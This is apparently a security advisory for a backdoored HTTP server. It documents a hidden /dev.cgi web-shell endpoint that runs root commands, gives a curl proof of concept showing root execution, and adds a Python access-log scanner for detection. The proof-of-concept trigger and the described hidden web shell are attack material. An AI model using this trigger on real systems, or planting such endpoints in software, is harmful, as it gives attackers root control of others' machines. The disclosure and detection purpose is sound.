- Type: hidden command
- Affected versions: 3.04.06 - 3.04.13
The /dev.htm web page creates a web-shell that makes requests to the /dev.cgi endpoint, of the form /dev.cgi?c=<cmd>, where cmd is a URL-encoded shell command that will be executed as root.
We first need to copy the www/ directory to /tmp/www/:
$ cp -r www/ /tmp/
We can then start up the HTTP server (e.g., with the backdoored variant):
$ ./backdoored/src/build/httpd
In a separate terminal, we can try running a shell command via the backdoor (e.g., id):
$ curl -v "http://localhost:8080/dev.cgi?c=id"
...
uid=0(root) gid=0(root) groups=0(root)
...
So we can see that the backdoor allows us to run arbitrary shell commands as root.
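A defender-side check for this endpoint, as an added example that is not part of the original page or the project's code: it scans access-log lines for requests to /dev.htm and /dev.cgi and decodes the c parameter. The Common Log Format input, the sample lines and the name find_backdoor_requests are assumptions; the page does not describe the server's logging.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Request part of a Common Log Format entry (the log format is an assumption).
REQUEST_RE = re.compile(
    r'^(?P<client>\S+) .*?"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})'
)
BACKDOOR_PATH = "/dev.cgi"  # hidden-command endpoint named on the page
SHELL_PAGE = "/dev.htm"     # web-shell page named on the page

# Constructed sample input, not captured from a real server.
SAMPLE_LOG = [
    '127.0.0.1 - - [01/Jan/2024:10:00:00 +0000] "GET /index.htm HTTP/1.1" 200 512',
    '127.0.0.1 - - [01/Jan/2024:10:00:05 +0000] "GET /dev.cgi?c=id HTTP/1.1" 200 41',
    '127.0.0.1 - - [01/Jan/2024:10:00:09 +0000] "GET /dev.cgi?c=uname%20-a HTTP/1.1" 200 80',
    '127.0.0.1 - - [01/Jan/2024:10:00:12 +0000] "GET /dev.htm HTTP/1.1" 200 900',
]


def find_backdoor_requests(lines):
    """Return one record per request that touches the hidden-command endpoint."""
    hits = []
    for line in lines:
        m = REQUEST_RE.match(line)
        if m is None:
            continue  # not a request line in the assumed format
        url = urlsplit(m["target"])
        path = unquote(url.path)  # also match percent-encoded spellings of the path
        record = {"client": m["client"], "status": int(m["status"])}
        if path == SHELL_PAGE:
            hits.append({**record, "kind": "web-shell page", "command": None})
        elif path == BACKDOOR_PATH:
            # parse_qs percent-decodes values and maps '+' to a space; the
            # server's own decoding may differ, so the raw query is kept too.
            cmds = parse_qs(url.query, keep_blank_values=True).get("c", [None])
            for cmd in cmds:
                hits.append({**record, "kind": "command", "command": cmd, "raw": url.query})
    return hits


if __name__ == "__main__":
    for hit in find_backdoor_requests(SAMPLE_LOG):
        print(hit)
```

Any hit with kind "command" and a 200 status on an affected version means a command ran as root, so the decoded command string is the starting point for scoping the incident.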